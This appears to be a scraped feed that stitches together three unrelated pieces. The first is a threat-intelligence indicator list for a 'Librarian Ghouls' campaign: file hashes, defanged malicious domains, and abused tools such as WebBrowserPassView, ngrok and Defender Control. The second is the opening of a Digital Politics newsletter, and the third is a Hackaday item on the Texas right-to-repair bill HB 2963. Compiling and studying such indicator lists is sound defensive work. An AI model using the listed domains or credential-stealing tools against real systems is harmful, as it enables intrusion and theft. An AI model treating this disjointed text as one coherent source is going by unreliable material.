fd58900ea22b38bad2ef3d1b8b74f5c7023b8ca8a5b69f88cfbfe28b2c585baf
e6ea6ce923f2eee0cd56a0874e4a0ca467711b889553259a995df686bd35de86
6954eaed33a9d0cf7e298778ec82d31bfbdf40c813c6ac837352ce676793db74

Malicious BAT files

e880a1bb0e7d422b78a54b35b3f53e348ab27425f1c561db120c0411da5c1ce9
c353a708edfd0f77a486af66e407f7b78583394d7b5f994cd8d2e6e263d25968
636d4f1e3dcf0332a815ce3f526a02df3c4ef2890a74521d05d6050917596748
c5eeec72b5e6d0e84ff91dfdcbefbbbf441878780f887febb0caf3cbe882ec72
8bdb8df5677a11348f5787ece3c7c94824b83ab3f31f40e361e600576909b073
2af2841bf925ed1875faadcbb0ef316c641e1dcdb61d1fbf80c3443c2fc9454f

Decoy documents

cab1c4c675f1d996b659bab1ddb38af365190e450dec3d195461e4e4ccf1c286
dfac7cd8d041a53405cc37a44f100f6f862ed2d930e251f4bf22f10235db4bb3
977054802de7b583a38e0524feefa7356c47c53dd49de8c3d533e7689095f9ac
65f7c3e16598a8cb279b86eaeda32cb7a685801ed07d36c66ff83742d41cd415
a6ff418f0db461536cff41e9c7e5dba3ee3b405541519820db8a52b6d818a01e
6c86608893463968bfda0969aa1e6401411c0882662f3e70c1ac195ee7bd1510

Malicious PS1 scripts

8b6afbf73a9b98eec01d8510815a044cd036743b64fef955385cbca80ae94f15
7d6b598eaf19ea8a571b4bd79fd6ff7928388b565d7814b809d2f7fdedc23a0a
01793e6f0d5241b33f07a3f9ad34e40e056a514c5d23e14dc491cee60076dc5a

Miner installer (install.exe)
649ee35ad29945e8dd6511192483dddfdfe516a1312de5e0bd17fdd0a258c27f

Miner controller (bmcontrol.exe)
9cce3eaae0be9b196017cb6daf49dd56146016f936b66527320f754f179c615f

Miner launcher (run.exe)
d7bcab5acc8428026e1afd694fb179c5cbb74c5be651cd74e996c2914fb2b839

Legitimate software

AnyDesk
Blat
curl
Defender Control
Customized RAR 3.80
AnyDesk
Mipko Personal Monitor
ngrok
NirCmd
4t Tray Minimizer
WebBrowserPassView

Librarian Ghouls malicious domains

vniir[.]space
vniir[.]nl
hostingforme[.]nl
mail-cheker[.]nl
unifikator[.]ru
outinfo[.]ru
anyhostings[.]ru
center-mail[.]ru
redaction-voenmeh[.]info
acountservices[.]nl
accouts-verification[.]ru
office-email[.]ru
email-office[.]ru
email-informer[.]ru
office-account[.]ru
deauthorization[.]online
anyinfos[.]ru
verifikations[.]ru
claud-mail[.]ru
users-mail[.]ru
detectis[.]ru
supersuit[.]site
downdown[.]ru
dragonfires[.]ru
bmapps[.]org

securelist.com/librarian-ghoul…

IT'S MONDAY, AND THIS IS DIGITAL POLITICS. I'm Mark Scott, and will be making a flying visit to Brussels this week. If you're around and want to grab coffee on June 11, drop me a line here. My colleagues are holding a webinar on June 12 about the upcoming United Nations Internet Governance Forum. You watch along here at 9am ET / 3pm CET.

— We're entering a new era of digital competition enforcement that pits Big Tech companies' vested interests against each other.

— The traditional approach to tackling foreign interference is woefully out of date. It's time for a rethink.

— Europe's decade-long push to combat state-backed online disinformation and cyber attacks.

Let's get started:

digitalpolitics.co/newsletter0…

In what could be a big step forward for consumer rights, the Texas Senate recently unanimously voted to pass HB 2963, which references the “Diagnosis, maintenance, and repair of certain digital electronic equipment”. If signed by the governor, this would make Texas the ninth US state to enact such a law, and the seventh pertaining to consumer electronics. Interestingly, this bill saw anti-parts pairing language added, which is something that got stripped from the Oregon bill.

Much like other Right to Repair bills, HB 2963 would require manufacturers to make spare parts, documentation and repair tools available to both consumers and independent repair shops. If signed, the act would take effect in September of 2026. Included in the bill are provisions to prevent overcharging for the provided parts and documentation.

As for how useful this is going to be for consumers, [Louis Rossmann] had a read of the bill and gave his typically eloquent thoughts. The tl;dw is that while there is a lot of stuff to like, this bill leaves open potentially massive loopholes (e.g. assemblies vs parts), while also carving out massive exemptions, which leaves owners of game consoles, boats, cars, tractors, home appliances, etc. stranded with no new options.

youtube.com/embed/C_ohgeWKcOY?…

hackaday.com/2025/06/09/texas-…